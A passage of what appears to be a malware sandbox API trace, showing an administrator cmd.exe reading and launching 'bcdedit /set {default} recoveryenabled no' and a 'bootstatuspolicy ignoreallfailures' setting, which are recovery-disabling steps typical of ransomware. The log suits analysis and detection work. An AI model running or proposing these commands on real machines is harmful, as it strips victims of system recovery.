MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e348, cchWideChar=1 | out: lpWideCharStr="t} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.603] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.603] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.603] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.603] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34a, cchWideChar=1 | out: lpWideCharStr="} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.603] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.603] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.603] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.603] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34c, cchWideChar=1 | out: lpWideCharStr=" bootstatuspolicy ignoreallfailures\n") returned 1 [0213.603] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.603] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.603] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.603] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34e, cchWideChar=1 | out: lpWideCharStr="rootstatuspolicy ignoreallfailures\n") returned 1 [0213.603] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.603] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.603] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.603] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e350, cchWideChar=1 | out: lpWideCharStr="eotstatuspolicy ignoreallfailures\n") returned 1 [0213.603] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.603] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.603] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.603] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e352, cchWideChar=1 | out: lpWideCharStr="ctstatuspolicy ignoreallfailures\n") returned 1 [0213.603] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.603] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.604] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e354, cchWideChar=1 | out: lpWideCharStr="ostatuspolicy ignoreallfailures\n") returned 1 [0213.604] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.604] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.604] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e356, cchWideChar=1 | out: lpWideCharStr="vtatuspolicy ignoreallfailures\n") returned 1 [0213.604] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.604] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.604] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e358, cchWideChar=1 | out: lpWideCharStr="eatuspolicy ignoreallfailures\n") returned 1 [0213.604] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.604] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.604] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35a, cchWideChar=1 | out: lpWideCharStr="rtuspolicy ignoreallfailures\n") returned 1 [0213.604] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.604] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.604] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35c, cchWideChar=1 | out: lpWideCharStr="yuspolicy ignoreallfailures\n") returned 1 [0213.604] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.604] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.604] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35e, cchWideChar=1 | out: lpWideCharStr="espolicy ignoreallfailures\n") returned 1 [0213.604] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.604] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.604] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e360, cchWideChar=1 | out: lpWideCharStr="npolicy ignoreallfailures\n") returned 1 [0213.604] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.604] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.604] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e362, cchWideChar=1 | out: lpWideCharStr="aolicy ignoreallfailures\n") returned 1 [0213.604] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.604] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.605] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e364, cchWideChar=1 | out: lpWideCharStr="blicy ignoreallfailures\n") returned 1 [0213.605] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.605] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.605] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e366, cchWideChar=1 | out: lpWideCharStr="licy ignoreallfailures\n") returned 1 [0213.605] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.605] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.605] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e368, cchWideChar=1 | out: lpWideCharStr="ecy ignoreallfailures\n") returned 1 [0213.605] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.605] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.605] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36a, cchWideChar=1 | out: lpWideCharStr="dy ignoreallfailures\n") returned 1 [0213.605] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.605] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.605] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36c, cchWideChar=1 | out: lpWideCharStr=" ignoreallfailures\n") returned 1 [0213.605] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.605] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.605] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36e, cchWideChar=1 | out: lpWideCharStr="nignoreallfailures\n") returned 1 [0213.605] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.605] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.605] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e370, cchWideChar=1 | out: lpWideCharStr="ognoreallfailures\n") returned 1 [0213.605] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.605] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.605] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e372, cchWideChar=1 | out: lpWideCharStr="\nnoreallfailures\n") returned 1 [0213.606] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.606] GetFileType (hFile=0x9c) returned 0x3 [0213.606] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.606] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.606] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.606] GetFileType (hFile=0xa8) returned 0x3 [0213.606] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.606] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="bcdedit /set {default} recoveryenabled no\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcdedit /set {default} recoveryenabled no\n", lpUsedDefaultChar=0x0) returned 43 [0213.606] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x1efb98, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1efb98*=0x2a, lpOverlapped=0x0) returned 1 [0213.606] GetProcessHeap () returned 0x2e0000 [0213.606] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x304e70 [0213.606] GetProcessHeap () returned 0x2e0000 [0213.606] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x304e70 | out: hHeap=0x2e0000) returned 1 [0213.606] GetProcessHeap () returned 0x2e0000 [0213.606] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f97c0 [0213.606] GetProcessHeap () returned 0x2e0000 [0213.606] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4610 [0213.607] GetProcessHeap () returned 0x2e0000 [0213.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x56) returned 0x2f99d0 [0213.607] GetConsoleOutputCP () returned 0x1b5 [0213.607] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0213.607] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0213.607] GetConsoleTitleW (in: lpConsoleTitle=0x1efb50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0213.607] GetProcessHeap () returned 0x2e0000 [0213.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x300ea0 [0213.607] GetProcessHeap () returned 0x2e0000 [0213.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x66) returned 0x2f5b70 [0213.607] GetProcessHeap () returned 0x2e0000 [0213.607] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2e1320 [0213.607] SetErrorMode (uMode=0x0) returned 0x0 [0213.607] SetErrorMode (uMode=0x1) returned 0x0 [0213.608] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e1330, lpFilePart=0x1ef3e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef3e0*="system32") returned 0x13 [0213.608] SetErrorMode (uMode=0x0) returned 0x1 [0213.608] GetProcessHeap () returned 0x2e0000 [0213.608] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1320, Size=0x48) returned 0x2e1320 [0213.608] GetProcessHeap () returned 0x2e0000 [0213.608] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1320) returned 0x48 [0213.608] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.608] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.608] GetProcessHeap () returned 0x2e0000 [0213.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x104) returned 0x2faa10 [0213.608] GetProcessHeap () returned 0x2e0000 [0213.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1f8) returned 0x2f9be0 [0213.608] GetProcessHeap () returned 0x2e0000 [0213.608] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9be0, Size=0x106) returned 0x2f9be0 [0213.608] GetProcessHeap () returned 0x2e0000 [0213.608] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9be0) returned 0x106 [0213.608] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.608] GetProcessHeap () returned 0x2e0000 [0213.608] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2f5be0 [0213.608] GetProcessHeap () returned 0x2e0000 [0213.608] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f5be0, Size=0x7e) returned 0x2f5be0 [0213.608] GetProcessHeap () returned 0x2e0000 [0213.608] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f5be0) returned 0x7e [0213.608] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.608] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0x2fe8a0 [0213.608] FindClose (in: hFindFile=0x2fe8a0 | out: hFindFile=0x2fe8a0) returned 1 [0213.608] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0xffffffffffffffff [0213.609] GetLastError () returned 0x2 [0213.609] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ef150, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef150) returned 0x2fe8a0 [0213.609] FindClose (in: hFindFile=0x2fe8a0 | out: hFindFile=0x2fe8a0) returned 1 [0213.609] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0213.609] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0213.609] GetConsoleTitleW (in: lpConsoleTitle=0x1ef6a0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0213.609] GetProcessHeap () returned 0x2e0000 [0213.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x21c) returned 0x2ff870 [0213.609] GetConsoleTitleW (in: lpConsoleTitle=0x2ff880, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0213.609] GetProcessHeap () returned 0x2e0000 [0213.609] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2ff870, Size=0xcc) returned 0x2ff870 [0213.609] GetProcessHeap () returned 0x2e0000 [0213.609] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2ff870) returned 0xcc [0213.609] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - bcdedit /set {default} recoveryenabled no") returned 1 [0213.610] GetProcessHeap () returned 0x2e0000 [0213.610] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2ff870 | out: hHeap=0x2e0000) returned 1 [0213.610] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef458, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef418 | out: lpAttributeList=0x1ef458, lpSize=0x1ef418) returned 1 [0213.610] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef458, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef408, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef458, lpPreviousValue=0x0) returned 1 [0213.610] GetStartupInfoW (in: lpStartupInfo=0x1ef570 | out: lpStartupInfo=0x1ef570*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x9c, hStdOutput=0xa8, hStdError=0xa8)) [0213.610] GetProcessHeap () returned 0x2e0000 [0213.610] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4640 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.610] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0213.611] _wcsnicmp (_String1="COPYCMD", 